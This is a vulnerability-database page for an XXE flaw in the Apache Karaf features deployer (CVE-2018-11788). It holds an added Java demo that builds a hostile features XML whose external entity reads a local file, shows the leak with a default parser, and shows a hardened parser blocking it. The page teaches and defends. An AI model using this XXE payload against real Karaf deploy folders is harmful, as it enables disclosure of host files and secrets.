
CVE-2018-11788

Published: 07/01/2019 Updated: 12/02/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML file by dropping it directly into the deploy folder. The features XML is parsed with the StAX XMLInputFactory class, and Karaf's use of XMLInputFactory contains no mitigation against XML External Entity (XXE) injection, so the JDK's default behaviour of resolving external entities applies. A user who can place a file in the deploy folder can therefore inject external XML entities into the parse in Apache Karaf versions before 4.1.7 and 4.2.2. It has been fixed in the Apache Karaf 4.1.7 and 4.2.2 releases.
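The summary names the two things that matter for this class of bug: an attacker-controlled XML file and an XMLInputFactory left at its defaults. The program below is an added example written for this page; it is not Karaf's code and not taken from the repository linked further down. It parses a constructed, hostile features XML the way a naive deployer might (pulling the text of each bundle element), first with a default XMLInputFactory and then with one carrying the standard StAX hardening properties SUPPORT_DTD and IS_SUPPORTING_EXTERNAL_ENTITIES. The class name, the bundleUrls helper, the temporary "secret" file and the payload are all constructed for illustration; the features namespace is the one used by Karaf 4.x features files.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class KarafFeaturesXxeDemo {

    // Stand-in for a features deployer: returns the text of every <bundle>
    // element, joined with '|'. Whatever the parser resolves ends up here.
    static String bundleUrls(XMLInputFactory factory, String xml) throws XMLStreamException {
        XMLStreamReader r = factory.createXMLStreamReader(new StringReader(xml));
        StringBuilder out = new StringBuilder();
        while (r.hasNext()) {
            if (r.next() == XMLStreamConstants.START_ELEMENT
                    && "bundle".equals(r.getLocalName())) {
                if (out.length() > 0) out.append('|');
                out.append(r.getElementText().trim());
            }
        }
        r.close();
        return out.toString();
    }

    // Vulnerable configuration (what the advisory describes): the JDK defaults
    // keep DTD support and external entity resolution switched on, so a
    // SYSTEM entity is fetched and inlined into the document.
    static XMLInputFactory defaultFactory() {
        return XMLInputFactory.newInstance();
    }

    // Hardened configuration: refuse DTDs and never resolve external entities.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for a sensitive file on the Karaf host.
        Path secret = Files.createTempFile("karaf-xxe-", ".txt");
        Files.write(secret, "karaf=constructed-secret".getBytes(StandardCharsets.UTF_8));

        // Constructed hostile features XML: the file an attacker would drop
        // into the deploy folder. The external entity points at the file above.
        String payload =
            "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
            "<!DOCTYPE features [\n" +
            "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n" +
            "]>\n" +
            "<features name=\"evil\" xmlns=\"http://karaf.apache.org/xmlns/features/v1.4.0\">\n" +
            "  <feature name=\"evil\" version=\"1.0.0\">\n" +
            "    <bundle>mvn:org.example/benign/1.0.0</bundle>\n" +
            "    <bundle>&xxe;</bundle>\n" +
            "  </feature>\n" +
            "</features>\n";

        // Default factory: the second bundle "URL" is the file's contents.
        System.out.println("default factory : " + bundleUrls(defaultFactory(), payload));

        // Hardened factory: the reader either throws (DOCTYPE/undeclared entity)
        // or the entity yields no text; the file content never reaches the caller.
        try {
            System.out.println("hardened factory: " + bundleUrls(hardenedFactory(), payload));
        } catch (XMLStreamException e) {
            System.out.println("hardened factory: rejected (" + e.getMessage() + ")");
        }

        Files.deleteIfExists(secret);
    }
}
```

Compile and run with a plain JDK (javac KarafFeaturesXxeDemo.java && java KarafFeaturesXxeDemo); no Karaf installation is needed. Setting SUPPORT_DTD to false is the decisive control, since it removes the place where entities are declared; disabling external entity support is belt-and-braces for code paths that must keep DTDs.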

Vulnerability Trend

Vulnerable Products

apache karaf 4.2.0

apache karaf

Vendor Advisories

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by the XMLInputFactory class. Apache Karaf's XMLInputFactory class doesn't contain any mitigation code against XXE. This is a potential security risk as a user can inject external XM ...

Github Repositories

Apache Karaf XXE Vulnerability (CVE-2018-11788)

Summary: Apache Karaf is a modern and polymorphic applications container. It's a lightweight, powered, and enterprise-ready container powered by OSGi. Apache Karaf is a "product project", providing a complete and turnkey runtime. The runtime is "multi-facets", meaning that you can deploy different kinds of applications: OSGi or non-OSGi, web application, s

A set of tech articles.

TechArticles: a set of tech articles. Table of Contents: Penetration Testing Study Notes, Comprehensive Penetration Case 1; On Building a Systematic Security Operations Center (SOC); Some Ideas and Reflections on Building Security on the Enterprise (In-House) Side; Apache Karaf XXE Vulnerability (CVE-2018-11788); Magento Unauthorized Remote Code Execution (CVE-2016-4010); Apache Tika Denial of Service Vulnerability (CVE-2018-11761)